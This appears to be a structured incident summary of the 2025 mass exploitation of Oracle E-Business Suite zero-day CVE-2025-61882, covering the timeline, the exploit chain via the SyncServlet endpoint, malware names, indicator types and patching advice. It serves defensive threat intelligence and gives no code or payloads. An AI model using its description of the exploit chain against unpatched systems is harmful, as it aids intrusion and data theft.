Full Report
Dozens of organizations may have been impacted following the zero-day exploitation of a security flaw in Oracle's E-Business Suite (EBS) software since August 9, 2025, Google Threat Intelligence Group (GTIG) and Mandiant said in a new report released Thursday. "We're still assessing the scope of this incident, but we believe it affected dozens of organizations," John Hultquist, chief analyst of
Analysis Summary
# Incident Report: Mass Exploitation of Oracle EBS via Zero-Day Flaw
## Executive Summary
Dozens of organizations were targeted in a large-scale campaign leveraging a zero-day vulnerability (CVE-2025-61882) in Oracle E-Business Suite (EBS) software, similar in style to prior Cl0p ransomware activities. Attackers achieved remote code execution to steal sensitive data, culminating in extortion attempts against executives. Response efforts involve ongoing scope assessment by Google and Mandiant, and Oracle has issued necessary patches.
## Incident Details
- Discovery Date: October 10, 2025 (Date of report detailing the campaign)
- Incident Date: Exploitation activity observed as early as August 9, 2025; high-volume attacks began September 29, 2025.
- Affected Organization: Dozens of organizations (specific names not disclosed in context).
- Sector: Various (Implied, concerning organizations using Oracle EBS).
- Geography: Not specified.
## Timeline of Events
### Initial Access
- Date/Time: As early as August 9, 2025 (Evidence of initial exploitation attempts dating back to July 10, 2025).
- Vector: Exploitation of a zero-day vulnerability in Oracle E-Business Suite (EBS) software, specifically tracking CVE-2025-61882 (CVSS 9.8).
- Details: Attackers leveraged a combination of flaws including Server-Side Request Forgery (SSRF), Carriage-Return Line-Feed (CRLF) injection, authentication bypass, and XSL template injection to achieve Remote Code Execution (RCE) on the target EBS server via the "/OA_HTML/SyncServlet" component and its Template Preview functionality.
### Lateral Movement
- Details: Upon achieving RCE, the attackers deployed Java payloads to establish persistent access, including downloading secondary stages via C2 infrastructure.
### Data Exfiltration/Impact
- Details: Sensitive data was confirmed exfiltrated from compromised systems. Following data theft, threat actors engaged in extortion, sending emails to company executives claiming compromise and demanding an unspecified ransom.
### Detection & Response
- Detection: Discovered and reported by Google Threat Intelligence Group (GTIG) and Mandiant in a report released on October 10, 2025.
- Response Actions: Oracle issued patches to address the vulnerability. GTIG and Mandiant are currently assessing the full scope of the incident.
## Attack Methodology
- Initial Access: Exploitation of Oracle EBS zero-day (CVE-2025-61882) using SSRF, CRLF injection, authentication bypass, and XSL template injection to gain RCE.
- Persistence: Establishment of a reverse shell, followed by deployment of Java payloads, including **GOLDVEIN.JAVA** (a downloader) and a Base64-encoded loader (**SAGEGIFT**) leading to **SAGELEAF** (in-memory dropper) and **SAGEWAVE** (malicious Java servlet filter).
- Privilege Escalation: Achieved by exploiting the underlying vulnerability to gain RCE, eventually leading to execution via the EBS 'appl' user context.
- Defense Evasion: Use of in-memory droppers (SAGELEAF) and encrypted archives for next-stage malware suggests evasion techniques.
- Credential Access: Compromised third-party accounts used for a high-volume email campaign, believed sourced from infostealer malware logs purchased on underground forums, used for the extortion communication phase.
- Discovery: Attackers were observed executing various reconnaissance commands from the EBS account "appl".
- Lateral Movement: Not detailed beyond initial access resulting in remote code execution and payload deployment.
- Collection: Data gathering occurred prior to or concurrent with payload installation.
- Exfiltration: Sensitive data was exfiltrated post-compromise.
- Impact: Extortion attempts directed at organization executives.
## Impact Assessment
- Financial: Unspecified ransom demands were made. Financial impact from remediation and investigation is pending.
- Data Breach: Sensitive data was exfiltrated; data type and volume are unspecified.
- Operational: The scope of operational disruption is currently under assessment.
- Reputational: Risk of negative publicity due to the large-scale nature of the attack and associated extortion.
## Indicators of Compromise
- Network indicators: C2 communication channels related to downloading GOLDVEIN and launching SAGEGIFT payloads (defanged, based on observed C2 activity).
- File indicators: Java payloads **GOLDVEIN.JAVA**, **SAGEGIFT** (Base64 loader), **SAGELEAF** (in-memory dropper), **SAGEWAVE** (malicious Java servlet filter). Overlap noted with FIN11 **GOLDTOMB** backdoor module.
- Behavioral indicators: Exploitation of Oracle EBS components including "/OA_HTML/SyncServlet" Template Preview functionality; execution of reconnaissance commands from the 'appl' user context.
## Response Actions
- Containment measures: Not explicitly detailed, but implied remediation upon discovery of the vulnerability.
- Eradication steps: Implied removal of deployed malware payloads (GOLDVEIN, SAGELEAF, etc.) from affected EBS servers.
- Recovery actions: Organizations must apply Oracle-issued patches. GTIG and Mandiant are continuing to assess the full extent of infections.
## Lessons Learned
- Key takeaways: Mass exploitation campaigns targeting zero-days in critical enterprise software (like Oracle EBS) remain a significant and recurring threat vector, often associated with established crime groups like Cl0p. Relying solely on established application security processes may be insufficient against active zero-day threats.
- What could have been done better: Proactive vulnerability management and rapid patching following vendor disclosures are critical when zero-days are publicly exploited.
## Recommendations
- Prevention measures for similar incidents:
1. Immediately apply all security patches released by Oracle for E-Business Suite, prioritizing those addressing high-CVSS vulnerabilities like CVE-2025-61882.
2. Review and segment network access to mission-critical applications like EBS, imposing strict firewall rules and web application firewalls (WAFs) to mitigate SSRF/injection attempts.
3. Implement robust monitoring of application execution paths, focusing on unexpected file execution or network connections originating from standard application service accounts (like 'appl').
4. Enhance threat intelligence consumption specifically related to known exploitation patterns of major enterprise software vendors.